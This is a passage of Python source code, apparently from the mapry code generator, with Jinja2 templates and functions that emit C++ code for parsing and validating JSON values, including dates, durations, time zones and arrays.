        const std::string& s,
        std::string* error) {
    std::smatch mtch;
    const bool matched = std::regex_match(s, mtch, re::kDuration);
    if (!matched) {
        std::stringstream sserr;
        sserr << "failed to match the duration: " << s;
        *error = sserr.str();
        return std::chrono::nanoseconds();
    }

    typedef std::chrono::nanoseconds::rep rep_t;

    ////
    // Extract nanoseconds
    ////

    const std::string nanoseconds_str = mtch[31];

    rep_t nanoseconds;
    if (nanoseconds_str.size() == 0) {
        // No nanoseconds specified
        nanoseconds = 0;
    } else if(nanoseconds_str.size() <= 9) {
        size_t first_nonzero = 0;
        for (; first_nonzero < nanoseconds_str.size();
                ++first_nonzero) {
            if (nanoseconds_str[first_nonzero] >= '0' and
                    nanoseconds_str[first_nonzero] <= '9') {
                break;
            }
        }

        if (first_nonzero == nanoseconds_str.size()) {
            // No non-zero numbers, all zeros behind the seconds comma
            nanoseconds = 0;
        } else {
            const rep_t fraction_as_integer(
                std::atol(&nanoseconds_str[first_nonzero]));
            const size_t order = 9 - nanoseconds_str.size();
            rep_t multiplier = 1;
            for (size_t i = 0; i < order; ++i) {
                multiplier *= 10;
            }
            nanoseconds = fraction_as_integer * multiplier;
        }
    } else {
        // Signal that the precision is lost
        std::stringstream sserr;
        sserr << "converting the duration to nanoseconds "
            "results in loss of precision: " << s;
        *error = sserr.str();
        return std::chrono::nanoseconds();
    }

    ////
    // Extract all the other interval counts
    ////

    const std::string sign_str = mtch[1];
    const rep_t sign = (sign_str.empty() or sign_str == "+") ? 1 : -1;

    const double years(
        (mtch[3].length() == 0) ? 0.0 : std::stod(mtch[3]));

    const double months(
        (mtch[7].length() == 0) ? 0.0 : std::stod(mtch[7]));

    const double weeks(
        (mtch[11].length() == 0) ? 0.0 : std::stod(mtch[11]));

    const double days(
        (mtch[15].length() == 0) ? 0.0 : std::stod(mtch[15]));

    const double hours(
        (mtch[20].length() == 0) ? 0.0 : std::stod(mtch[20]));

    const double minutes(
        (mtch[24].length() == 0) ? 0.0 : std::stod(mtch[24]));

    const rep_t seconds(
        (mtch[29].length() == 0) ? 0 : std::stol(mtch[29]));

    ////
    // Sum
    ////

    rep_t sum = nanoseconds;

    const rep_t max_seconds(
        std::numeric_limits<rep_t>::max() / (1000L * 1000L * 1000L));
    if (seconds > max_seconds) {
        std::stringstream sserr;
        sserr << "seconds in duration overflow as nanoseconds: " << s;
        *error = sserr.str();
        return std::chrono::nanoseconds();
    }

    const rep_t seconds_as_ns = seconds * 1000L * 1000L * 1000L;
    if (sum > std::numeric_limits<rep_t>::max() - seconds_as_ns) {
        std::stringstream sserr;
        sserr << "duration overflow as nanoseconds: " << s;
        *error = sserr.str();
        return std::chrono::nanoseconds();
    }
    sum += seconds_as_ns;

    bool overflows;

    sum = add_rep_double(
        sum, minutes * 6e10, &overflows);
    if (overflows) {
        std::stringstream sserr;
        sserr << "duration overflows as nanoseconds: " << s;
        *error = sserr.str();
        return std::chrono::nanoseconds();
    }

    sum = add_rep_double(
        sum, hours * 3.6e12, &overflows);
    if (overflows) {
        std::stringstream sserr;
        sserr << "duration overflows as nanoseconds: " << s;
        *error = sserr.str();
        return std::chrono::nanoseconds();
    }

    sum = add_rep_double(
        sum, days * 24.0 * 3.6e12, &overflows);
    if (overflows) {
        std::stringstream sserr;
        sserr << "duration overflows as nanoseconds: " << s;
        *error = sserr.str();
        return std::chrono::nanoseconds();
    }

    sum = add_rep_double(
        sum, weeks * 7.0 * 24.0 * 3.6e12, &overflows);
    if (overflows) {
        std::stringstream sserr;
        sserr << "duration overflows as nanoseconds: " << s;
        *error = sserr.str();
        return std::chrono::nanoseconds();
    }

    sum = add_rep_double(
        sum, months * 30.436875 * 24.0 * 3.6e12, &overflows);
    if (overflows) {
        std::stringstream sserr;
        sserr << "duration overflows as nanoseconds: " << s;
        *error = sserr.str();
        return std::chrono::nanoseconds();
    }

    sum = add_rep_double(
        sum, years * 365.2425 * 24.0 * 3.6e12, &overflows);
    if (overflows) {
        std::stringstream sserr;
        sserr << "duration overflows as nanoseconds: " << s;
        *error = sserr.str();
        return std::chrono::nanoseconds();
    }

    // sum is always positive, so the multiplication by -1 can not
    // overflow since |max rep_t| < |min rep_t|
    if (sign < 0) {
        sum = -sum;
    }

    return std::chrono::nanoseconds(sum);
}''')
@ensure(lambda result: not result.endswith('\n'))
def _value_type_to_string() -> str:
    """
    Generate the C++ function to convert ``Json::ValueType`` to a string.

    The generated function is used by the parsing snippets to report
    "expected X, but got Y" errors.

    :return: generated code
    """
    return textwrap.dedent(
        '''\
/**
 * converts a JSON value type to a human-readable string representation.
 *
 * @param value_type to be converted
 * @return string representation of the JSON value type
 */
std::string value_type_to_string(Json::ValueType value_type) {
    switch (value_type) {
        case Json::ValueType::nullValue: return "null";
        case Json::ValueType::intValue: return "int";
        case Json::ValueType::uintValue: return "uint";
        case Json::ValueType::realValue: return "real";
        case Json::ValueType::stringValue: return "string";
        case Json::ValueType::booleanValue: return "bool";
        case Json::ValueType::arrayValue: return "array";
        case Json::ValueType::objectValue: return "object";
        default:
            std::stringstream ss;
            ss << "Unhandled value type in value_to_string: "
                << value_type;
            throw std::domain_error(ss.str());
    }
}''')
class _AutoID:
    """Dispense unique, monotonically increasing parsing identifiers."""

    def __init__(self) -> None:
        """Start counting identifiers from zero."""
        self._counter = 0

    @ensure(
        lambda result: re.match(r'^0|[1-9][0-9]*$', result),
        enabled=icontract.SLOW)
    def next_identifier(self) -> str:
        """
        Produce the next unused identifier.

        :return: the identifier as a decimal string
        """
        current = self._counter
        self._counter += 1
        return str(current)
_PARSE_BOOLEAN_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isBool()) {
constexpr auto expected_but_got(
"Expected a bool, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
{{ target_expr }} = {{ value }}.asBool();
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_boolean(
        value_expr: str, target_expr: str, ref_parts: List[str],
        auto_id: _AutoID) -> str:
    """
    Generate the C++ snippet that parses a JSON boolean.

    The snippet reads ``value_expr`` and assigns the result to
    ``target_expr``, reporting failures under the path given by
    ``ref_parts``.

    :param value_expr: C++ expression of the JSON value
    :param target_expr: C++ expression of where to store the parsed value
    :param ref_parts: C++ expression of reference path segments to the value
    :param auto_id: generator of unique identifiers
    :return: C++ code
    """
    return _PARSE_BOOLEAN_TPL.render(
        uid=auto_id.next_identifier(),
        value_expr=value_expr,
        target_expr=target_expr,
        ref_parts=ref_parts)
_PARSE_INTEGER_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}{# /value_expr|is_variable #}
if (!{{ value }}.isInt64()) {
constexpr auto expected_but_got(
"Expected an int64, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
{% if a_type.minimum is none and a_type.maximum is none %}
{{ target_expr }} = {{ value }}.asInt64();
{% else %}
const auto cast_{{ uid }} = {{ value }}.asInt64();
bool ok_{{ uid }} = true;
{% if a_type.minimum is not none %}
{% set op = ">" if a_type.exclusive_minimum else ">=" %}
if (!(cast_{{ uid }} {{ op }} {{ a_type.minimum }})) {
constexpr auto expected_but_got(
"Expected "
{{ "%s %d"|format(op, a_type.minimum)|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
std::to_string(cast_{{ uid }})));
ok_{{ uid }} = false;
}
{% endif %}
{% if a_type.maximum is not none %}
{% set op = "<" if a_type.exclusive_maximum else "<=" %}
if (!(cast_{{ uid }} {{ op }} {{ a_type.maximum }})) {
constexpr auto expected_but_got(
"Expected "
{{ "%s %d"|format(op, a_type.maximum)|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
std::to_string(cast_{{ uid }})));
ok_{{ uid }} = false;
}
{% endif %}
if (ok_{{ uid }}) {
{{ target_expr }} = cast_{{ uid }};
}
{% endif %}{# /if a_type.minimum is none and a_type.maximum is none #}
}
''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_integer(
        value_expr: str, target_expr: str, ref_parts: List[str],
        a_type: mapry.Integer, auto_id: _AutoID) -> str:
    """
    Generate the C++ snippet that parses a JSON integer.

    The snippet reads ``value_expr`` and assigns the result to
    ``target_expr``, reporting failures under the path given by
    ``ref_parts``.

    :param value_expr: C++ expression of the JSON value
    :param target_expr: C++ expression of where to store the parsed value
    :param ref_parts: C++ expression of reference path segments to the value
    :param a_type: mapry definition of the value type
    :param auto_id: generator of unique identifiers
    :return: generated code
    """
    rendered = _PARSE_INTEGER_TPL.render(
        uid=auto_id.next_identifier(),
        value_expr=value_expr,
        target_expr=target_expr,
        ref_parts=ref_parts,
        a_type=a_type)
    return rendered.rstrip("\n")
_PARSE_FLOAT_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isDouble()) {
constexpr auto expected_but_got(
"Expected a double, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
{% if a_type.minimum is none and a_type.maximum is none %}
{{ target_expr }} = {{ value }}.asDouble();
{% else %}
const auto cast_{{ uid }} = {{ value }}.asDouble();
bool ok_{{ uid }} = true;
{% if a_type.minimum is not none %}
{% set op = ">" if a_type.exclusive_minimum else ">=" %}
if (!(cast_{{ uid }} {{ op }} {{ a_type.minimum }})) {
constexpr auto expected_but_got(
"Expected "
{{ "%s %f"|format(op, a_type.minimum)|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
std::to_string(cast_{{ uid }})));
ok_{{ uid }} = false;
}
{% endif %}{# /if a_type.minimum is not none #}
{% if a_type.maximum is not none %}
{% set op = "<" if a_type.exclusive_maximum else "<=" %}
if (!(cast_{{ uid }} {{ op }} {{ a_type.maximum }})) {
constexpr auto expected_but_got(
"Expected "
{{ "%s %f"|format(op, a_type.maximum)|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
std::to_string(cast_{{ uid }})));
ok_{{ uid }} = false;
}
{% endif %}{# /if a_type.maximum is not none #}
if (ok_{{ uid }}) {
{{ target_expr }} = cast_{{ uid }};
}
{% endif %}{# /if a_type.minimum is none and a_type.maximum is none #}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_float(
        value_expr: str, target_expr: str, ref_parts: List[str],
        a_type: mapry.Float, auto_id: _AutoID) -> str:
    """
    Generate the C++ snippet that parses a JSON floating-point number.

    The snippet reads ``value_expr`` and assigns the result to
    ``target_expr``, reporting failures under the path given by
    ``ref_parts``.

    :param value_expr: C++ expression of the JSON value
    :param target_expr: C++ expression of where to store the parsed value
    :param ref_parts: C++ expression of reference path segments to the value
    :param a_type: mapry definition of the value type
    :param auto_id: generator of unique identifiers
    :return: generated code
    """
    rendered = _PARSE_FLOAT_TPL.render(
        uid=auto_id.next_identifier(),
        value_expr=value_expr,
        target_expr=target_expr,
        ref_parts=ref_parts,
        a_type=a_type)
    return rendered.rstrip("\n")
_PARSE_STRING_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
{% if a_type.pattern is none %}
{{ target_expr }} = {{ value }}.asString();
{% else %}
const static std::regex regex_{{ uid }}(
R"v0g0n({{ a_type.pattern.pattern }})v0g0n");
const std::string cast_{{ uid }} = {{ value }}.asString();
bool ok_{{ uid }} = true;
if (!std::regex_match(cast_{{ uid }}, regex_{{ uid }})) {
constexpr auto expected_but_got(
"Expected to match "
{{ a_type.pattern.pattern|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
cast_{{ uid }}));
ok_{{ uid }} = false;
}
if (ok_{{ uid }}) {
{{ target_expr }} = cast_{{ uid }};
}
{% endif %}{# /if a_type.pattern is none #}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_string(
        value_expr: str, target_expr: str, ref_parts: List[str],
        a_type: mapry.String, auto_id: _AutoID) -> str:
    """
    Generate the C++ snippet that parses a JSON string.

    The snippet reads ``value_expr`` and assigns the result to
    ``target_expr``, reporting failures under the path given by
    ``ref_parts``.

    :param value_expr: C++ expression of the JSON value
    :param target_expr: C++ expression of where to store the parsed value
    :param ref_parts: C++ expression of reference path segments to the value
    :param a_type: mapry definition of the value type
    :param auto_id: generator of unique identifiers
    :return: generated code
    """
    rendered = _PARSE_STRING_TPL.render(
        uid=auto_id.next_identifier(),
        value_expr=value_expr,
        target_expr=target_expr,
        ref_parts=ref_parts,
        a_type=a_type)
    return rendered.rstrip("\n")
_PARSE_PATH_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
{% set set_target %}
{% if cpp.path_as == "std::filesystem::path" %}
{{ target_expr }} = std::filesystem::path(
{{ value }}.asString());
{% elif cpp.path_as == "boost::filesystem::path" %}
{{ target_expr }} = boost::filesystem::path(
{{ value }}.asString());
{% else %}
{{ _raise("Unhandled cpp.path_as: %s"|format(cpp.path_as)) }}
{% endif %}
{% endset %}{#
#}
{% if a_type.pattern is none %}
{{ set_target }}
{% else %}
const static std::regex regex(
R"v0g0n({{ a_type.pattern.pattern }})v0g0n");
const std::string cast_{{ uid }} = {{ value }}.asString();
bool ok_{{ uid }} = true;
if (!std::regex_match(cast_{{ uid }}, regex)) {
constexpr auto expected_but_got(
"Expected to match "
{{ a_type.pattern.pattern|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
cast_{{ uid }}));
ok_{{ uid }} = false;
}
if (ok_{{ uid }}) {
{{ set_target|indent }}
}
{% endif %}{# /if a_type.pattern is none #}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_path(
        value_expr: str, target_expr: str, ref_parts: List[str],
        a_type: mapry.Path, auto_id: _AutoID, cpp: mapry.Cpp) -> str:
    """
    Generate the C++ snippet that parses a JSON string into a path.

    The snippet reads ``value_expr`` and assigns the result to
    ``target_expr``, reporting failures under the path given by
    ``ref_parts``.

    :param value_expr: C++ expression of the JSON value
    :param target_expr: C++ expression of where to store the parsed value
    :param ref_parts: C++ expression of reference path segments to the value
    :param a_type: mapry definition of the value type
    :param auto_id: generator of unique identifiers
    :param cpp: C++ settings (selects the filesystem library)
    :return: generated code
    """
    rendered = _PARSE_PATH_TPL.render(
        uid=auto_id.next_identifier(),
        value_expr=value_expr,
        target_expr=target_expr,
        ref_parts=ref_parts,
        a_type=a_type,
        cpp=cpp)
    return rendered.rstrip("\n")
_PARSE_CTIME_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
const std::string cast_{{ uid }} = {{ value }}.asString();
struct tm tm_{{ uid }} = tm{0};
char* ret_{{ uid }} = strptime(
cast_{{ uid }}.c_str(),
{{ a_type.format|escaped_str }},
&tm_{{ uid }});
if (ret_{{ uid }} == nullptr or *ret_{{ uid }} != '\\0') {
constexpr auto expected_but_got(
"Expected to strptime "
{{ a_type.format|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
cast_{{ uid }}));
} else {
{{ target_expr }} = tm_{{ uid }};
}
}''')
_PARSE_DATE_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
std::istringstream iss_{{ uid }}(
{{ value }}.asString());
iss_{{ uid }} >>
date::parse(
{{ a_type.format|escaped_str }},
{{ target_expr }} );
if (iss_{{ uid }}.fail()) {
constexpr auto expected_but_got(
"Expected to date::parse "
{{ a_type.format|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
{{ value }}.asString()));
}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_date(
        value_expr: str, target_expr: str, ref_parts: List[str],
        a_type: mapry.Date, auto_id: _AutoID, cpp: mapry.Cpp) -> str:
    """
    Generate the code to parse a date.

    The code parses the ``value_expr`` into the ``target_expr``, dispatching
    on the configured C++ date/time library.

    :param value_expr: C++ expression of the JSON value
    :param target_expr: C++ expression of where to store the parsed value
    :param ref_parts: C++ expression of reference path segments to the value
    :param a_type: mapry definition of the value type
    :param auto_id: generator of unique identifiers
    :param cpp: C++ settings
    :return: generated code
    """
    uid = auto_id.next_identifier()

    if cpp.datetime_library == 'ctime':
        return _PARSE_CTIME_TPL.render(
            uid=uid,
            value_expr=value_expr,
            ref_parts=ref_parts,
            target_expr=target_expr,
            a_type=a_type).rstrip("\n")

    if cpp.datetime_library == 'date.h':
        return _PARSE_DATE_TPL.render(
            uid=uid,
            value_expr=value_expr,
            ref_parts=ref_parts,
            target_expr=target_expr,
            a_type=a_type).rstrip("\n")

    # Fixed typo ("Unhnadled") so the message matches the one in _includes.
    raise NotImplementedError(
        "Unhandled datetime library: {}".format(cpp.datetime_library))
@ensure(lambda result: not result.endswith('\n'))
def _parse_date_time(
        value_expr: str, target_expr: str, ref_parts: List[str],
        a_type: mapry.Datetime, auto_id: _AutoID, cpp: mapry.Cpp) -> str:
    """
    Generate the code to parse a date-time.

    The code parses the ``value_expr`` into the ``target_expr``.  The
    templates are shared with :func:`_parse_date` since both only rely on
    ``a_type.format``.

    :param value_expr: C++ expression of the JSON value
    :param target_expr: C++ expression of where to store the parsed value
    :param ref_parts: C++ expression of reference path segments to the value
    :param a_type: mapry definition of the value type
    :param auto_id: generator of unique identifiers
    :param cpp: C++ settings
    :return: generated code
    """
    uid = auto_id.next_identifier()

    if cpp.datetime_library == 'ctime':
        return _PARSE_CTIME_TPL.render(
            uid=uid,
            value_expr=value_expr,
            ref_parts=ref_parts,
            target_expr=target_expr,
            a_type=a_type).rstrip("\n")

    if cpp.datetime_library == 'date.h':
        return _PARSE_DATE_TPL.render(
            uid=uid,
            value_expr=value_expr,
            ref_parts=ref_parts,
            target_expr=target_expr,
            a_type=a_type).rstrip("\n")

    # Fixed typo ("Unhnadled") so the message matches the one in _includes.
    raise NotImplementedError(
        "Unhandled datetime library: {}".format(cpp.datetime_library))
_PARSE_TIME_OF_DAY_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
std::chrono::seconds seconds_of_day_{{ uid }};
std::istringstream iss_{{ uid }}(
{{ value }}.asString());
iss_{{ uid }} >>
date::parse(
{{ a_type.format|escaped_str }},
seconds_of_day_{{ uid }} );
if (iss_{{ uid }}.fail()) {
constexpr auto expected_but_got(
"Expected to date::parse "
{{ a_type.format|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
{{ value }}.asString()));
} else {
{{ target_expr }} = date::make_time(
seconds_of_day_{{ uid }});
}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_time(
        value_expr: str, target_expr: str, ref_parts: List[str],
        a_type: mapry.Time, auto_id: _AutoID, cpp: mapry.Cpp) -> str:
    """
    Generate the code to parse a time.

    The code parses the ``value_expr`` into the ``target_expr``.

    :param value_expr: C++ expression of the JSON value
    :param target_expr: C++ expression of where to store the parsed value
    :param ref_parts: C++ expression of reference path segments to the value
    :param a_type: mapry definition of the value type
    :param auto_id: generator of unique identifiers
    :param cpp: C++ settings
    :return: generated code
    :raise: NotImplementedError on an unsupported ``cpp.datetime_library``
    """
    uid = auto_id.next_identifier()

    if cpp.datetime_library == 'ctime':
        return _PARSE_CTIME_TPL.render(
            uid=uid,
            value_expr=value_expr,
            ref_parts=ref_parts,
            target_expr=target_expr,
            a_type=a_type).rstrip("\n")

    if cpp.datetime_library == 'date.h':
        return _PARSE_TIME_OF_DAY_TPL.render(
            uid=uid,
            value_expr=value_expr,
            ref_parts=ref_parts,
            target_expr=target_expr,
            a_type=a_type).rstrip("\n")

    # Typo fixed ("Unhnadled" -> "Unhandled"); the elif/else chain was
    # dropped since the branches above return, matching the sibling
    # _parse_* functions.
    raise NotImplementedError(
        "Unhandled datetime library: {}".format(cpp.datetime_library))
_PARSE_TIME_ZONE_AS_STR_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
{{ target_expr }} = {{ value }}.asString();
}''')
_PARSE_TIME_ZONE_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
const std::string cast_{{ uid }} = {{ value }}.asString();
try {
{{ target_expr }} = date::locate_zone(
cast_{{ uid }});
} catch(const std::runtime_error& e) {
constexpr auto expected_but_got(
"Expected a valid IANA time zone, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
cast_{{ uid }}));
}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_time_zone(
        value_expr: str, target_expr: str, ref_parts: List[str],
        a_type: mapry.TimeZone, auto_id: _AutoID, cpp: mapry.Cpp) -> str:
    """
    Generate the code to parse a time zone.

    The code parses the ``value_expr`` into the ``target_expr``.

    :param value_expr: C++ expression of the JSON value
    :param target_expr: C++ expression of where to store the parsed value
    :param ref_parts: C++ expression of reference path segments to the value
    :param a_type: mapry definition of the value type
    :param auto_id: generator of unique identifiers
    :param cpp: C++ settings
    :return: generated code
    :raise: NotImplementedError on an unsupported ``cpp.datetime_library``
    """
    uid = auto_id.next_identifier()

    # With ctime the zone is stored as a plain string; with date.h it is
    # resolved against the IANA database.
    template_by_library = {
        'ctime': _PARSE_TIME_ZONE_AS_STR_TPL,
        'date.h': _PARSE_TIME_ZONE_TPL
    }

    tpl = template_by_library.get(cpp.datetime_library, None)
    if tpl is None:
        raise NotImplementedError(
            "Unhandled datetime library: {}".format(cpp.datetime_library))

    return tpl.render(
        uid=uid,
        value_expr=value_expr,
        ref_parts=ref_parts,
        target_expr=target_expr,
        a_type=a_type).rstrip("\n")
_PARSE_DURATION_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
const std::string cast_{{ uid }}_str = {{ value }}.asString();
std::string error_{{ uid }};
std::chrono::nanoseconds cast_{{ uid }} = duration_from_string(
cast_{{ uid }}_str, &error_{{ uid }});
if (!error_{{ uid }}.empty()) {
constexpr auto invalid_duration(
"Invalid duration: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
invalid_duration,
strlen(invalid_duration),
error_{{ uid }}));
} else {
{{ target_expr }} = cast_{{ uid }};
}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_duration(
        value_expr: str, target_expr: str, ref_parts: List[str],
        a_type: mapry.Duration, auto_id: _AutoID) -> str:
    """
    Generate the code to parse a duration.

    The code parses the ``value_expr`` into the ``target_expr``.

    :param value_expr: C++ expression of the JSON value
    :param target_expr: C++ expression of where to store the parsed value
    :param ref_parts: C++ expression of reference path segments to the value
    :param a_type: mapry definition of the value type
    :param auto_id: generator of unique identifiers
    :return: generated code
    """
    # Durations are library-independent, so a single template suffices.
    return _PARSE_DURATION_TPL.render(
        uid=auto_id.next_identifier(),
        value_expr=value_expr,
        ref_parts=ref_parts,
        target_expr=target_expr,
        a_type=a_type).rstrip("\n")
_PARSE_ARRAY_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}{## set value expression ##}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
{% set set_target %}{## set target block ##}
{{ target_cpp_type }}& target_{{ uid }} = {{ target_expr }};
target_{{ uid }}.resize({{ value }}.size());
size_t i_{{ uid }} = 0;
for (const Json::Value& item_{{ uid }} : {{ value }}) {
{{ item_parsing|indent }}
++i_{{ uid }};
if (errors->full()) {
break;
}
}
{% endset %}
if (!{{ value }}.isArray()) {
constexpr auto expected_but_got(
"Expected an array, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
{% if minimum_size is not none %}
} else if ({{ value }}.size() < {{ minimum_size }}) {
constexpr auto expected_but_got(
"Expected an array of minimum size "
{{ "%d"|format(minimum_size)|escaped_str }}
", but got: ");
errors->add(
